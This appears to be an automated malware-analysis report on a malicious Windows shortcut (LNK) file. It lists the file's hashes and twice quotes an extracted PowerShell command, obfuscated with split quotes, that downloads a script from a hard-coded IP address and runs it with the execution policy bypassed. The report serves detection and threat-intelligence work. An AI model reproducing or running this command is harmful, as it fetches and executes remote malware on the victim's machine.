Characteristics
| Hash | Hash Value |
|---|---|
| MD5 | b72baa66fb35df5bb4618541e81976a5 |
| Sha1 | f3b3517607a8ffe9c113d419f45086e127960a0f |
| Sha256 | c543a9c2ab6349444795f2493ce6b7027a3bf0b3e3d0bfdd078a291de7a7e7bd |
| Sha384 | ad57741e17a3f70db1a6f2e4b8aed8595045cf817e9ff642dde519e146a06f7f7e56e8401ce882d559a040c38cf6ef94 |
| Sha512 | 9a85e3e0d6fdb31a14f63e7d371e2b1b5392cf5b1aab65eb18a1472d02050edace7ff046bb36ee5e4a4d3ec3d39e14744157458904823b3c15c43f90421eaac8 |
| SSDeep | 12:8d/V7OlK0ocgeWVUcFYg4Scgo6LWs8XcPLL9LBniY2X0pjbgQFy/9fpDA40DLaOC:8d/V7OVg3TYgfyMPVVij4jbgQAAGOq |
| TLSH | ACF3483466F50300F1F37B3CB933B75049AE754DDE2187CC00A0D61C5922E64E965B3A |
File Structure
b72baa66fb35df5bb4618541e81976a5
Malicious
Artefacts
| Name | Value |
|---|---|
| LNK: Command Execution | powershell.exe -win 1 iwr -uri htt''p://14''6''.''185.23''9''.8/so4nik/capacity.ps1 -OutFile capacity.ps1; powershell.exe -noprofile -executionpolicy bypass -file "$env:localappdata\capacity.ps1" |
b72baa66fb35df5bb4618541e81976a5 (166.35 KB)
Characteristics
No malware configuration was found at this point.
Artefacts
| Name | Value | Location |
|---|---|---|
| LNK: Command Execution | powershell.exe -win 1 iwr -uri htt''p://14''6''.''185.23''9''.8/so4nik/capacity.ps1 -OutFile capacity.ps1; powershell.exe -noprofile -executionpolicy bypass -file "$env:localappdata\capacity.ps1" (Malicious) | b72baa66fb35df5bb4618541e81976a5 |